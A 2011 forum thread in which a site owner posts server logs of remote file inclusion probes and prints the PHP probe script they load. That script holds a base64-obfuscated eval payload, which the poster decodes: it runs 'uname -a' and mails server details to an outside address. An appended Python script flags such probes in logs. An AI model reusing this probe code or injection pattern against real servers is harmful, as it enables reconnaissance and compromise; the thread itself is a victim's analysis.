What Is This?? Server Log Entry...

Discussion in 'BlackHat Lounge' started by unknown00, Jun 2, 2011.

  1. unknown00

    unknown00 Regular Member

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:44:21 (Date=0 EDT) libwww-perl/5.803

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:44:22 (Date=0 EDT) libwww-perl/5.803

    IP: 67.85.53.112 |Date:
    -06-2011 / 07:44:56 (Date=0 EDT) Mozilla/5.0 (PLAYSTATION 3; 1.00)

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:45:30 (Date=0 EDT) libwww-perl/5.803

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:45:31 (Date=0 EDT) libwww-perl/5.803

    When I go to the above link I'm prompted to open/download a txt file, which I do...
    and this is what it looks like:

    Code:
    <?
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    echo "PLaTo<br>";
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
     $safemode = true;
     $hsafemode = "4ON6";
    }
    else {$safemode = false; $hsafemode = "3OFF6";}
    $xos = wordwrap(php_uname(),90,"<br>",1);
    $xpwd = @getcwd();
    $OS = "<<".$hsafemode.">> ".$xos."";
    echo "<center><A class=ria href=\"http://".$OS."\">";echo "PLaTo</A></center><br>";
    echo "<br>OSTYPE:$OS<br>";
    echo "<br>Pwd:$xpwd<br>";
    eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21v
    ZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAi
    T0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJv
    bSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycp
    OyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1Rf
    VVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIu
    JHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNh
    ZmVtb2RlOyBtYWlsKCJnd2FkdWtAZ21haWwuY29tIiwiU2V0b3JhbiBCb3MgIi4kc2FmZW1vZGUs
    JGJvZHksJGZsb2F0KTs="));
    die("<center> ByroeNet </center>");
    ?>
    When I decode the base64, this is what I get:

    Code:
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
        $safemode = "ON";
    } else {
        $safemode = "OFF";
    }
    $visitor = $_SERVER["REMOTE_ADDR"];
    $float = "From : vurl info <[email protected]>";
    $aran = exec('uname -a;');
    $web = $_SERVER["HTTP_HOST"];
    $inj = $_SERVER["REQUEST_URI"];
    $body = "Bug http://".$web.$inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$safemode;
    mail("[email protected]","Setoran Bos ".$safemode,$body,$float);
    Should I be worried???
     
  2. unknown00

    unknown00 Regular Member

    No one has an idea??
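
Added example, not part of the original thread: a Python triage script for log entries in the layout shown in the first post. It flags requests whose parameter value is itself a remote URL (the remote file inclusion probe pattern those entries show) and groups them by source IP. The sample log is constructed with placeholder hosts and addresses, and the function names are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample in the same three-line layout as the log in the post
# (hosts, addresses and dates are placeholders, not values from the thread).
SAMPLE_LOG = """\
gigs=http://files.example.net/tmp/id.txt?
IP: 192.0.2.10 |Date:
10-01-2012 / 07:44:21 (Date=0 EDT) libwww-perl/5.803

IP: 198.51.100.7 |Date:
10-01-2012 / 07:44:56 (Date=0 EDT) Mozilla/5.0 (PLAYSTATION 3; 1.00)

gigs=web+design
IP: 198.51.100.7 |Date:
10-01-2012 / 07:45:02 (Date=0 EDT) Mozilla/5.0 (PLAYSTATION 3; 1.00)

gigs=http://files.example.net/tmp/id.txt?
IP: 192.0.2.10 |Date:
10-01-2012 / 07:45:30 (Date=0 EDT) libwww-perl/5.803
"""

REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)   # parameter value is a URL
SCRIPTED_UA = re.compile(r"libwww-perl|curl|wget|python-requests", re.I)
STAMP = re.compile(r"^(\S+ / \S+) \(Date=[^)]*\) (.*)$")  # timestamp + user agent

def parse_records(text):
    """Yield one dict per blank-line-separated log record."""
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {"params": {}, "ip": None, "when": None, "ua": ""}
        for line in (l.strip() for l in block.splitlines()):
            if line.startswith("IP:"):
                rec["ip"] = line[3:].split("|")[0].strip()
            elif (m := STAMP.match(line)):      # checked before "=" (line has Date=)
                rec["when"], rec["ua"] = m.group(1), m.group(2)
            elif "=" in line:
                name, _, value = line.partition("=")
                rec["params"][name] = value
        yield rec

def find_remote_include_probes(text):
    """Group requests whose parameter value is a remote URL by source IP."""
    hits = defaultdict(list)
    for rec in parse_records(text):
        for name, value in rec["params"].items():
            if REMOTE_URL.match(value):
                hits[rec["ip"]].append({
                    "param": name, "url": value, "when": rec["when"],
                    "scripted": bool(SCRIPTED_UA.search(rec["ua"]))})
    return dict(hits)
```

A hit only shows that the probe was sent; whether the script ran depends on whether the application includes the parameter value, which the log alone does not tell you.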